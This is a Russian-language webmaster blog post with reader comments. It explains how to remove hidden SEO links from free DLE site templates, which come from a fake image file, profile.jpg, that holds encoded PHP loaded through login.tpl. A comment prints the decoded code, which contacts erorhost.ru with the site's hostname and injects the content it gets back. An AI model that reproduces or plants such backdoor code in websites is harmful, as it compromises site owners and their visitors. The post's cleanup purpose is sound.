Удаляем спрятанные ссылки в шаблонах DLE
Многие из нас используют бесплатные шаблоны и даже не подозревают, о том, что там находятся скрытые ссылки. Так как визуально их определить практически не возможно.
А если вы ещё и авторизовались на сайте, то Вам вообще этих ссылок не будет видно.
Уже всем давно понятно, что чем меньше исходящих ссылок идет с вашего сайта тем лучше. Для той же sape и конечно же веса страницы в плане SEO, а не кб. =)
Способ №1 / Легкий
Конечно все ещё встречаются ссылки в шаблонах которые ставят на точки и их легко найти в исходниках.
Пример:
[url=http://vasilenko.info].[/url]
Так же наглядный пример как это будет смотреться в самом шаблоне:
Написал:
Alex V, 27 мая 2010 | Мнений 21| Просмотров: 728
*обратите внимание на запятую (,) после ника Alex V.
Такую ссылочку можно легко удалить в файле shortstory.tpl, но мы сейчас будем обсуждать более сложные методы.
Способ №2 / Сложный
Именно об этом способе я и хотел поговорить в этом посте. Он мне чем-то напоминает аналогичный способ в WordPresse, но только как мне кажется более запутанный для простых пользователей.
Если сказать честно, то вчера я примерно 4 часа искал как убрать с шаблона этот ЗЛОБНЫЙ код, в котором стояло сразу 4 ссылки. Бррр… (это не реклама колы)
Ссылки стоят по такому типу:
[url=http://vasilenko.info][/url]
*обратите внимание! URL без анкора, точек и без запятых. Думаю понятно, что такие ссылки используются для накручивания PR и Тиц.
Я бы и ничего не заметил, если бы не стал исправлять и редактировать шаблон, чтобы он был уникальным. Обычно я сижу и работаю в Google Chrome, но вчера, по нужным мне причинам залез в браузер FireFox.
И смотрел через него исходный код сайта и тут увидел такое…
*Картинка кликабельна! Нажмите чтобы просмотреть её полностью!
Сначала подумал, что у меня FireFox заражен или это просто какой-то баг. Так как в Chrome такого кода и близко не было.
Но, стоило мне на сайте выйти со своего аккаунта и я увидел там такой же код.
Я перерыл все файлы шаблона, все стили, одним словом все файлы, но ничего так и не нашел. Была только одна зацепка, это файл Login.tpl, так как перед левыми ссылками, стоит слово РЕГИСТРАЦИЯ (см. выше на скрине)
Но, там не было левых ссылок =(
Я уже очень долго работаю с движком DLE и у меня есть сайты на инклудах, так как в PHP я ничего не понимаю. Но, в инклудах разбираюсь уже очень давно. По этому я и обратил внимание на вот эту строчку:
Первое на что я обратил внимание это на слово INCLUDE, значит что-то он прикрепляет к файлу login.tpl.
Второе, это “$login_p=” я понятия не имею за что он отвечает. Но вроде бы раньше я его никогда не видел в шаблоне логина.
И третье, это ссылка на картинку profile.jpg. Которой и близко не было в самой панели авторизации.
С этого уже можно делать какие-то выводы.
Я поставил черточку в файле profile_.jpg, на скрине я её отметил темно-розовым цветом. И о ЧУДО! Этот ужасный код пропал!
Теперь осталось обратить внимание, на саму эту картину:
Я зашел в папку с шаблоном, а далее в папку /images/ и понятно же увидел эту картинку profile.jpg.
И сразу обратил внимание на то, что у неё нед предпросмотра как у других картинок на этом скрине.
Странно не правда ли?
Я решил открыть этот файл с помощью блокнота (у меня стоит NotePAD 2, советую использовать его):
И о чудо! Я увидел там PHP код…
Не знаю как это все работает, но это меня сильно удивило. Код как я понял чем-то закодированный, по этому, что он скрывает сказать не могу.
Я конечно же удалил эту картинку и решил вернуться к файлу login.tpl:
И удалил лишний код, я его тоже отметил на скрине.
Вот собственно и все! Будьте внимательны и сразу смотрите на картинки =) Таких шаблонов с лишними ссылками очень много!
В помощь вебмастеру:
Любую исходящую ссылку можно найти с помощью онлайн сервиса, по поиску исходящих/внешних ссылок. Например тут http://pr-cy.ru/link_extractor?url=vasilenko.info
На этой неделе ждите:
Постараюсь ещё написать пост, о том как убрать спрятанные ссылки в шаблонах WordPress и не нарушить сам дизайн. UPD 26.07.2010.
Пост о нужных плагинах для WP напишу немного позже
Спасибо Всем за внимание! И спасибо за то, что с нами!
Вот что оно прячет там:
“”
$sock = @fsockopen(”www.erorhost.ru”, 80, $errstr, $errno, 30);
if ($sock){
$headers = “GET /sait/id2.php?site=”.$_SERVER['HTTP_HOST'].” HTTP/1.1\n”;
$headers .= “Host: http://www.erorhost.ru\n”;
$headers .= “Accept: text/html, text/plain, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress Accept-Language: ru,en Accept-Charset: windows-1251, iso-8859-1;q=0.01, us-ascii;q=0.01\n\n”;
fwrite($sock, $headers);
$x10 = false;
while (!feof($sock)) {
$x11=fgets($sock,128);
if ($x10)
$result .= $x11;
else
$x13 .= $x11;
if ($x11 == “\r\n” )
$x10 = true;
}
fclose($sock);
}
else return $error;
if (strstr($x13,’404′)) return $error;
else return $result;
аааа…не пропускает вп пхп код(
Степан, а от куда сами ссылки берутся?
И за что этот код вообще отвечает?
Спасибо, за то, что расшифровали код.
[...] дней назад я писал о том, как убрать очень хорошо спрятанные ссылки в CMS DLE и обещал написать о всеми любимом движке WordPress на [...]
Я уже весь сайт “перерыл” не могу найти одну внешнюю ссылку, что делать?
Я нашел в фале: …/engine/modules/show.short.php
Строка № 329
Искал с помощью “Notepad++” – Задал поиск ссылки в папке с DLE
Денис у Вас наверно Null версия движка, когда сайты нулят, часто ставят свои ссылочки.
Например нулл от Mid-Team прячет ссылки по-моему в файле topnews.php.
Я сейчас вообще советую искать ссылки через браузер FireFox и аддон .RDS BAR. Подробнее тут можно почитать http://vasilenko.info/2010/08/25/dopolneniya-firefox/
Alex V (СаНьКа), да так и есть… Спасибо за ссылку!
Большое спасибо за этот материал – очень помог, а то я уже и не знал что делать с грёбанной скрытой ссылкой
Да, практически все шаблоны “не от автора” содержат лишние ссылки. Ещё бывает, что при обновлении плагина или виджета также появляются эти самые ссылки.
Подскажите, пожалуйста, как обнаружить однопиксельные гиперссылки, кроме предварительного просмотра в почтовом клиенте? Имеется в виду в комментариях (старые).
Алена зайдите в админ панели по этой ссылке “http://ВАШСАЙТ.ru/admin.php?mod=comments&action=edit”
Здравствуй Alex! не могу найти скрытую ссылку в шаблоне на DLE, просматривая исходный код через браузер я ее нашел вставляется в начале поста между заголовком и статьей отображается как пустое место но в каком файле искать просмотрел все файлы но что то не нашел, может переменная?
Наткнулся тоже на невидимую ссылку в шаблоне но не знаю где искать ее=( в исходном коде она стоит между заголовком и постом не подскажешь в каком файле ее искать буду очень благодарен!
@Chevinkton, ищите в файле fullstory.tpl или shortstory.tpl.